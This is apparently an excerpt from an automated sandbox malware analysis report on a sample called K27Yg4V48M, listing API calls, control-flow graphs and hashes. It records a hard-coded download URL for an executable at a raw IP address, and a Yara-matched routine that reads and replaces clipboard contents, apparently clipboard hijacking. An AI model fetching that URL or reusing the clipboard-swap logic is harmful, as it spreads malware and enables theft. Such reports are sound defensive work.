                                                                                                    • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                    • Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 475 42e074-42e081 call 431f5e 478 42e083-42e086 ExitThread 475->478 479 42e08c-42e094 475->479 479->478 480 42e096-42e09a 479->480 481 42e0a1-42e0a7 480->481 482 42e09c call 4354f6 480->482 484 42e0b4-42e0ba 481->484 485 42e0a9-42e0ab 481->485 482->481 484->478 487 42e0bc-42e0be 484->487 485->484 486 42e0ad-42e0ae CloseHandle 485->486 486->484 487->478 488 42e0c0-42e0ca FreeLibraryAndExitThread 487->488
                                                                                                    APIs
                                                                                                      • Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                                                                      • Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
                                                                                                      • Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                                                                    • ExitThread.KERNEL32 ref: 0042E086
                                                                                                    • CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
                                                                                                    • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1198197534-0
                                                                                                    • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                    • Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
                                                                                                    • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                    • Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 489 40239e-4023ac 490 402561-402563 PostQuitMessage 489->490 491 4023b2-4023b7 489->491 492 402569-40256e 490->492 493 4023d0-4023d7 491->493 494 4023b9-4023cb DefWindowProcW 491->494 495 4023d9 call 401da4 493->495 496 4023de-4023e5 493->496 494->492 495->496 496->492 498 4023eb-40255f call 4010ba call 4029f4 496->498 498->492
                                                                                                    APIs
                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00402563
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostProcQuitWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3873111417-0
                                                                                                    • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                    • Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
                                                                                                    • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                    • Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 503 40155a-4016d0 Sleep call 4010ba 505 4016d5-4016d9 503->505
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00001D1B), ref: 00401562
                                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$Sleep
                                                                                                    • String ID: http://176.113.115.19/ScreenUpdateSync.exe
                                                                                                    • API String ID: 3358372957-3120454669
                                                                                                    • Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                                                                    • Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
                                                                                                    • Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                                                                    • Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 0040298F
                                                                                                    • __fassign.LIBCMT ref: 0040299F
                                                                                                      • Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                                    • String ID:
                                                                                                    • API String ID: 2843524283-0
                                                                                                    • Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                    • Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
                                                                                                    • Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                    • Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00000400,?,?,02100223,?,?), ref: 02100E19
                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,02100223,?,?), ref: 02100E1E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode
                                                                                                    • String ID:
                                                                                                    • API String ID: 2340568224-0
                                                                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                    • Instruction ID: d5591706dddec6dc70c020a45b27ca906bb1356f428d6b1f08c8c78c4e708908
                                                                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                    • Instruction Fuzzy Hash: 05D0123114512877D7002A94DC09BCD7B1CDF09B66F108011FB0DE9080C7B0954046E5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                    • Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
                                                                                                    • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                    • Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __fread_nolock
                                                                                                    • String ID:
                                                                                                    • API String ID: 2638373210-0
                                                                                                    • Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                                                    • Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
                                                                                                    • Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                                                    • Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A
                                                                                                    APIs
                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                    • String ID:
                                                                                                    • API String ID: 323602529-0
                                                                                                    • Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                                                    • Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
                                                                                                    • Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                                                    • Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog3_catch
                                                                                                    • String ID:
                                                                                                    • API String ID: 3886170330-0
                                                                                                    • Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                                                                    • Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
                                                                                                    • Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                                                                    • Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __wsopen_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 3347428461-0
                                                                                                    • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                    • Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
                                                                                                    • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                    • Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                    • Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
                                                                                                    • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                    • Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                    • Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
                                                                                                    • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                    • Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD
                                                                                                    APIs
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004103C7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throw
                                                                                                    • String ID:
                                                                                                    • API String ID: 2005118841-0
                                                                                                    • Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                                                                    • Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
                                                                                                    • Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                                                                    • Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                    • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                                                                    • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                    • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 020C04B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481462096.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_20c0000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                    • Instruction ID: 2cb508e6d8b0cf1181822ffe7edb2e44ebf312c9ddd73b77b6cfa0631b25b76b
                                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                    • Instruction Fuzzy Hash: A2113C79A40208EFDB01DF98C985E9DBBF5AF08350F1580A4F9489B361D371EA50EF80
                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 0210194D
                                                                                                    • Sleep.KERNEL32(00001541), ref: 02101957
                                                                                                      • Part of subcall function 0210CE77: _strlen.LIBCMT ref: 0210CE8E
                                                                                                    • OpenClipboard.USER32(00000000), ref: 02101984
                                                                                                    • GetClipboardData.USER32(00000001), ref: 02101994
                                                                                                    • _strlen.LIBCMT ref: 021019B0
                                                                                                    • _strlen.LIBCMT ref: 021019DF
                                                                                                    • _strlen.LIBCMT ref: 02101B23
                                                                                                    • EmptyClipboard.USER32 ref: 02101B39
                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000001), ref: 02101B46
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 02101B70
                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 02101B79
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 02101B80
                                                                                                    • CloseClipboard.USER32 ref: 02101BA4
                                                                                                    • Sleep.KERNEL32(000002D2), ref: 02101BAF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                    • String ID: 4#E$i
                                                                                                    • API String ID: 4246938166-2480119546
                                                                                                    • Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                                                                    • Instruction ID: 677766c13b75cb8300d93291e6bd6da5c3925df23d6b47de865c0752521f2ca9
                                                                                                    • Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                                                                    • Instruction Fuzzy Hash: 64512631C40394EED3219FA4DD85BED7B74FF1A306F045225E805A21B2EBB49685CBA9
                                                                                                    APIs
                                                                                                    • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 0210239C
                                                                                                    • GetClientRect.USER32(?,?), ref: 021023B1
                                                                                                    • GetDC.USER32(?), ref: 021023B8
                                                                                                    • CreateSolidBrush.GDI32(00646464), ref: 021023CB
                                                                                                    • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 021023EA
                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0210240B
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 02102416
                                                                                                    • MulDiv.KERNEL32(00000008,00000000), ref: 0210241F
                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02102443
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 021024CE
                                                                                                    • _wcslen.LIBCMT ref: 021024E6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1529870607-0
                                                                                                    • Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                                                                    • Instruction ID: b2030a1dc85f865d549c58d138f59f85194e98e7d1cb43197e25a7d728180221
                                                                                                    • Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                                                                    • Instruction Fuzzy Hash: AA71DD72900228AFDB229F64DD85FAEB7BCEF09751F0041A5F609E6155DA70AF84CF24
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __floor_pentium4
                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                    • Opcode ID: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                                                    • Instruction ID: 9e6dbbf50b3e3cea2dd72b1fc58d7ba5eae27dc46f9bc3f4d00a4e89d85e9552
                                                                                                    • Opcode Fuzzy Hash: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                                                    • Instruction Fuzzy Hash: 96C25B71E096288FDB25CE29DD407EAB7B5EB48304F1551EBD80DE7280E778AE818F45
                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
                                                                                                    • GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID: ACP$OCP
                                                                                                    • API String ID: 2299586839-711371036
                                                                                                    • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                    • Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
                                                                                                    • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                    • Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8
                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0213BCF4,?,00000000), ref: 0213BA6E
                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0213BCF4,?,00000000), ref: 0213BA97
                                                                                                    • GetACP.KERNEL32(?,?,0213BCF4,?,00000000), ref: 0213BAAC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID: ACP$OCP
                                                                                                    • API String ID: 2299586839-711371036
                                                                                                    • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                    • Instruction ID: d9909d27028ad1650b7bde76fcc3932a470f9894e44eecb18f87c0ea7f180130
                                                                                                    • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                    • Instruction Fuzzy Hash: 7021B032A88904EAE736CF54D901BA7B7A7EB40E6CB578465E94ADB100F732DF40C390
                                                                                                    APIs
                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2287132625-0
                                                                                                    • Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                                                    • Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
                                                                                                    • Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                                                    • Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9
                                                                                                    APIs
                                                                                                      • Part of subcall function 02132141: GetLastError.KERNEL32(?,?,0212A9EC,?,00000000,?,0212CDE6,0210247E,00000000,?,00451F20), ref: 02132145
                                                                                                      • Part of subcall function 02132141: _free.LIBCMT ref: 02132178
                                                                                                      • Part of subcall function 02132141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321B9
                                                                                                      • Part of subcall function 02132141: _free.LIBCMT ref: 021321A0
                                                                                                      • Part of subcall function 02132141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321AD
                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0213BCB5
                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 0213BD10
                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0213BD1F
                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,02130A1C,00000040,?,02130B3C,00000055,00000000,?,?,00000055,00000000), ref: 0213BD67
                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,02130A9C,00000040), ref: 0213BD86
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2287132625-0
                                                                                                    • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
